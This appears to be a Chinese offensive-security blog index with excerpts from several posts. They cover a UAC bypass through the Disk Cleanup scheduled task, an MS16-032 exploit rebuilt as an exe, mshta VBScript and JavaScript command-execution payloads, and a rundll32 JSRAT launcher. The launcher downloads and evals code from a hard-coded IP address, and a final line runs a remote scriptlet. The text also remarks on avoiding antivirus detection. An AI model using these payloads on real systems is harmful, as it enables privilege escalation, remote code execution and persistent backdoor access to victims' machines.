最近看到enigma0x3博客上分享了一种通过Disk Cleanup计划任务进行bypassuac的姿势，感觉还是不错的，所以在这儿分享一下。原文在这里 戳我
关于BypassUAC工具已经很多了，有个非常不错的工具 UACME

简单的说一下通过Disk Cleanup进行bypassuac的原理。

Win10有一个计划任务叫做SilentCleanup,具体位置在\Microsoft\Windows\DiskCleanup

授人以鱼不如授人以渔 之前的MS16-032是个powershell脚本，怎么样改成exe呢，很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里： 戳我 gist貌似被墙了，我在这里也贴一下：/*Author: Evilc ...

看用“世界上最好的编程语言”制作的敲诈者木马揭秘的时候发现，攻击者使用mshta来执行命令，之前没怎么接触过，查了查资料也不是很多，mshta是用来执行hta文件的，经过测试发现，其实没有hta文件，也可以通过mshta来执行命令的，经过几次测试发现mshta不仅可以使用vbscript，而且可以使用javascript来执行命令，整理payload如下：

VBSCRIPT EXEC

1

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

1

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Demo: 劫持快捷键，执行命令。 Code: calc: $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(&quo ...

0x00 优化JSRAT

进一步优化的jsrat启动代码：

1

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");try{q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){h.SetProxy(2,v);}}finally{h.Open("GET","http://54.93.72.226:8080/connect",false);h.Send();B=h.ResponseText;eval(B)}

当客户端存在代理的时候，通过代理来进行链接。

多了注册表关键字，容易被杀，可以使用WSC方式来启动，将代码写到远程文件，执行如下命令：

1

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://url/script")